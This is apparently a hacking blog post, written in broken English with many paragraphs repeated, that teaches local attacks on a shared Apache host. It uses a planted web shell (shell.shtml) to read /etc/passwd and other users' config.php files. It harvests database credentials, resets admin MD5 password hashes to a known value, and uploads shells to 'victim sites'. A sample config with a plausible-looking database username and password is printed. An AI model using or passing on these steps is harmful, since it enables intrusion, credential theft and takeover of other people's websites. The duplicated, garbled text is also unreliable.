And this is a some command basic for linux need to remember for execute like this video:
cat file
dir /folder/
cat /etc/passwd (view file 'passwd' in folder /etc/)
This is 3 commands very inportant, remember!
Okey, now, look your server [Apache]
Server: - id: 497(apache) - uid=497 (apache) gid=500(apache)
Server: - id: 497(apache) - uid=497 (apache) gid=500(apache)
it's mean you can use my method for local attack :)
When you see Apache => You need to use shell.shtml or freedom to access any folder.
P/s:
Reverse this server.
we need to find the user first!
and find the user we need to attack!
use this command: cat /etc/passwd or less /etc/passwd or get /etc/passwd
for get user
Step 1: Detected IP server and User for bypass
When you see Apache => You need to use shell.shtml or freedom to access any folder.
P/s:
Reverse this server.
we need to find the user first!
and find the user we need to attack!
use this command: cat /etc/passwd or less /etc/passwd or get /etc/passwd
for get user
=> IP/~user/linkshell
ex: www.LetHacking.com/upload/shell.shtml
bypass like this:
=> 192.168.1.2/~LetHacking/upload/shell.shtml
bypass like this:
=> 192.168.1.2/~LetHacking/upload/shell.shtml
Step 2: Use the commands on there for view file config
cat file
dir /folder/
cat /etc/passwd (view file 'passwd' in folder /etc/)
example:
dir /home/user/public_html
cat /home/user/public_html/config.php
the file content maybe like this:
example:
dir /home/user/public_html
cat /home/user/public_html/config.php
the file content maybe like this:
$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'thayphet_thayp';
$db['default']['password'] = 'thayphet';
$db['default']['database'] = 'thayphet_thayp';
$db['default']['dbdriver'] = 'mysql';
Step 3: Find file config and Connect or login database for edit, view, insert etc...
Step 4: Login admin and upload shell on the victim sites.May be you need to find admin :) it's so hard for newbie if the admin try to hide admin folder ^^ But don't worry about that, follow my blog, and I'll teach you how can you do that.
p/s:
if you can't dictionary the hash password md5
you can change that password like me for login .
202cb962ac59075b964b07152d234b70 => 123
6658b6244532f4898ebfe66e0a7c6c42 => can't crack
=> Login with new password we have just reset
_____________________________
If you don't understand what I say so you can watch my video :)
If you need my shell, I'll spend you, but now I'm too busy... I'll upload as soon as I can do.
Updating... shell code...
p/s:
if you can't dictionary the hash password md5
you can change that password like me for login .
202cb962ac59075b964b07152d234b70 => 123
6658b6244532f4898ebfe66e0a7c6c42 => can't crack
=> Login with new password we have just reset
_____________________________
If you don't understand what I say so you can watch my video :)
If you need my shell, I'll spend you, but now I'm too busy... I'll upload as soon as I can do.
Updating... shell code...
No comments:
Post a Comment